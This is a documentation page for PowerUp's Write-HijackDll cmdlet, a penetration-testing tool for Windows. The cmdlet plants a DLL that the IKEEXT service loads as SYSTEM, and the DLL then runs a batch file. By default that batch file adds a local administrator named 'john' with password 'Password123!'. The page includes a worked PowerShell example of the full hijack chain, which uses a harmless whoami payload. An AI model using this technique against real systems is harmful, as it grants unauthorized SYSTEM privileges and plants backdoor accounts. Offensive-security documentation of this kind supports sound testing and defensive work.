path: root/docs/Privesc/Write-HijackDll.md
blob: d38e3e73ca0397ef13ae38279f2dc7b4d109fb09 (plain)
# Write-HijackDll

## SYNOPSIS
Patches the path of a specified .bat (containing the specified command) into a
pre-compiled hijackable C++ DLL and writes the DLL out to the specified -DllPath location.

Author: Will Schroeder (@harmj0y)  
License: BSD 3-Clause  
Required Dependencies: None

## SYNTAX

```
Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
 [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]
```

## DESCRIPTION
First builds a self-deleting .bat file that either runs the specified -Command or adds a
local user (-UserName / -Password, or -Credential) to the specified -LocalGroup, and writes
that .bat out to -BatPath.
The BatPath is then patched into a pre-compiled C++ DLL that is built to be hijackable by
the IKEEXT service; when the service loads the DLL, the DLL launches the .bat.
There are two DLLs, one for x86 and one for x64, and both are embedded in PowerUp as
base64-encoded strings; the one matching -Architecture is used.
The patched DLL is then written out to -DllPath.

## EXAMPLES

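### Example 1

The invocation below is an added example and is not part of PowerUp's own documentation. It assumes that PowerUp.ps1 has already been dot-sourced, that `C:\Program Files\Vulnerable` is a directory on the system %PATH% which the current user can write to (the kind of location `Find-PathDLLHijack` reports), and that the DLL is named `wlbsctrl.dll`, the library the IKEEXT service looks for along %PATH% on affected Windows versions. The hijack directory and the file names are assumptions for illustration. The example checks the location before writing, uses a custom -Command instead of the default user creation, and verifies what was written.

```powershell
# Added example, not PowerUp's own code.
# Assumptions: PowerUp.ps1 is dot-sourced; $HijackDir is a directory on the
# system %PATH% that the current user can write to; wlbsctrl.dll is the name
# IKEEXT searches for along %PATH%.
$HijackDir = 'C:\Program Files\Vulnerable'             # assumed writable dir on %PATH%
$DllPath   = Join-Path $HijackDir 'wlbsctrl.dll'        # DLL name IKEEXT tries to load
$BatPath   = Join-Path $env:TEMP 'ikeext-payload.bat'   # where the self-deleting .bat goes

# IKEEXT runs as a native (LocalSystem) process, so match the OS bitness
# rather than the bitness of the current PowerShell host.
$Arch = if ([Environment]::Is64BitOperatingSystem) { 'x64' } else { 'x86' }

# Sanity checks before touching disk: the directory must really be on %PATH%
# and writable by us, otherwise the DLL will never be picked up.
$OnPath = ($env:PATH -split ';') -contains $HijackDir
$Writable = $false
try {
    $Probe = Join-Path $HijackDir ([IO.Path]::GetRandomFileName())
    [IO.File]::WriteAllText($Probe, '')
    Remove-Item -Path $Probe -Force
    $Writable = $true
} catch { $Writable = $false }
if (-not ($OnPath -and $Writable)) {
    throw "$HijackDir is not on %PATH% or not writable; pick another directory"
}

# Custom command instead of the default "add local admin john" behaviour:
# record the identity the .bat runs under, which should be NT AUTHORITY\SYSTEM.
$Command = 'whoami /all > C:\Windows\Temp\ikeext-whoami.txt'

$Result = Write-HijackDll -DllPath $DllPath -Architecture $Arch -BatPath $BatPath -Command $Command
$Result   # PowerUp.HijackableDLL object describing what was written

# Verify the artifacts: the DLL exists and the .bat actually carries our command.
if (-not (Test-Path -Path $DllPath)) { throw 'DLL was not written' }
if ((Get-Content -Path $BatPath -Raw) -notmatch [regex]::Escape($Command)) {
    throw '.bat does not contain the expected command'
}

# The DLL is only loaded when IKEEXT (re)starts. An unprivileged user normally
# cannot restart the service, so in practice this means waiting for a reboot;
# if you are already an administrator validating the chain, Restart-Service IKEEXT
# triggers the load immediately.
Get-Service -Name IKEEXT | Select-Object Name, Status, StartType
```

Once IKEEXT has loaded the DLL, `C:\Windows\Temp\ikeext-whoami.txt` should exist and the .bat at `$BatPath` should be gone, since it deletes itself after running. Both the DLL written outside System32 and the .bat in %TEMP% are artifacts a defender can watch for.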

## PARAMETERS

### -DllPath
File name to write the generated DLL out to.

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: True
Position: 1
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```

### -Architecture
The Architecture to generate for the DLL, x86 or x64.
If not specified, PowerUp
will try to automatically determine the correct architecture.

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 2
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```

### -BatPath
Path to the .bat for the DLL to launch.

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 3
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```

### -UserName
The \[domain\\\]username to add.
If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 4
Default value: john
Accept pipeline input: False
Accept wildcard characters: False
```

### -Password
The password to set for the added user.
If not given, it defaults to "Password123!"

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 5
Default value: Password123!
Accept pipeline input: False
Accept wildcard characters: False
```

### -LocalGroup
Local group name to add the user to (default of 'Administrators').

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 6
Default value: Administrators
Accept pipeline input: False
Accept wildcard characters: False
```

### -Credential
A \[Management.Automation.PSCredential\] object specifying the user/password to add.

```yaml
Type: PSCredential
Parameter Sets: (All)
Aliases: 

Required: False
Position: 7
Default value: [Management.Automation.PSCredential]::Empty
Accept pipeline input: False
Accept wildcard characters: False
```

### -Command
Custom command to execute instead of user creation.

```yaml
Type: String
Parameter Sets: (All)
Aliases: 

Required: False
Position: 8
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```

## INPUTS

## OUTPUTS

### PowerUp.HijackableDLL

## NOTES

## RELATED LINKS